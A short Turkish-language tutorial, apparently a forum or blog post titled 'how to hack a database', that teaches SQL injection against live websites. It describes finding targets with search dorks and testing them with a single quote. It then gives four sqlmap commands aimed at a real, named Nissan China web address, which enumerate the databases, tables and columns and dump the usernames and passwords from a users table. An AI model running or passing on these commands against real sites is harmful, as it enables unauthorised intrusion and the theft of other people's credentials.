DATABASE NASIL HACKLENİR?


MERHABA BENİM KÜÇÜK ENFEKSİYONLARIM :D
BU GÜN SİZLERE NASIL DATABASE NASIL HACKLENİR ÖĞRETCEM ASLINDA BU İŞLEM BASİTTİR.
ÖNCELİKLE DOR İLE ARAYALIM HEDE SİSTEMLERİ
ÖRNEĞİN DORK BU OLSUN ;)
ŞİMDİ ÇIKAN SİTEYE GİRİYORUZ VE URL NİN SONUNA TEK TIRNAK KOYALIM VE BİZE ERROR VERECEKTİR ;).
ARDINDAN SQL MAP A GEÇİP
1 - sqlmap -u http://www.nissan.com.cn/minisite/autoshow_2014BJ/booth/news2.php?id=2 --dbs
EĞER WİNDOWSTAYSANIZ SQLMAP IN BULUNDAU YERE GİDİP LİNK YERİNE SQLMAP -U "AÇIKLISİTE.COM" --DBS YAPINIZ
2 - sqlmap -u http://www.nissan.com.cn/minisite/autoshow_2014BJ/booth/news2.php?id=2 -D nissancars --tables
ARDINDAN...
3 - sqlmap -u http://www.nissan.com.cn/minisite/autoshow_2014BJ/booth/news2.php?id=2 -D nissancars -T users --columns
ARDINDAN DA
4 - sqlmap -u http://www.nissan.com.cn/minisite/autoshow_2014BJ/booth/news2.php?id=2 -D nissancars -T users -C Usernasme,Pass --dump
İŞTE ELDE ETTİĞİNİZ BİLGİ SAYESİNDE ŞU ANDA NİSSAN NIN DATABASESİNİ HACKLEDİK.
BU SİTE DEKİ AÇIKLIĞI BULAN KİŞ BlacK-p0yRaZ dır

Yorumlar